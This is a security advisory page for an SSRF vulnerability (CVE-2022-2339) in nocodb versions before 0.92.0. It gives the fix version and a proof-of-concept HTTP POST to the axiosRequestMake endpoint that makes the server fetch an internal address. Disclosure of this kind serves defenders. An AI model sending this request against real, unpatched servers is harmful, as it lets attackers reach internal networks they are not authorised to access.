Server-side Request Forgery (SSRF) Affecting nocodb package, versions <0.92.0
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.15% (51st
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-NOCODB-2944243
- published 7 Jul 2022
- disclosed 7 Jul 2022
- credit Aziz Hakim
Introduced: 7 Jul 2022
CVE-2022-2339 Open this link in a new tabHow to fix?
Upgrade nocodb
to version 0.92.0 or higher.
Overview
nocodb is a NocoDB
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to improper validation when importing CSV or Excel files via URL. Using this option, exploitation is possible by crafting the responseType
parameter.
PoC:
POST /api/v1/db/meta/axiosRequestMake HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
xc-gui: true
xc-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImRldkBsb2NhbC5ob3N0IiwiZmlyc3RuYW1lIjpudWxsLCJsYXN0bmFtZSI6bnVsbCwiaWQiOiJ1c184OTJhemRkY2F5cXFvcCIsInJvbGVzIjoiIsInRva2VuX3ZlcnNpb24iOiI0MWU5ZDUwIzYWQ2NjFjZjMzNzUxMmJlZDIwZDllNzliNSIsImlhdCI6MTY1NTE4Mjc2OH0.zE-Z0xoYcmKn1Fp5inqdzmf3gfMXWvl64GbS8ahPpF4
Content-Length: 55
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/dashboard/
Cookie: refresh_token=924112616a665e0baeca68cc4c1b815d23d971f655651fe12669176cfbb28c8babcfda6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"apiMeta":{"url":"http://10.0.0.1","responseType":""}}
References
CVSS Scores
version 3.1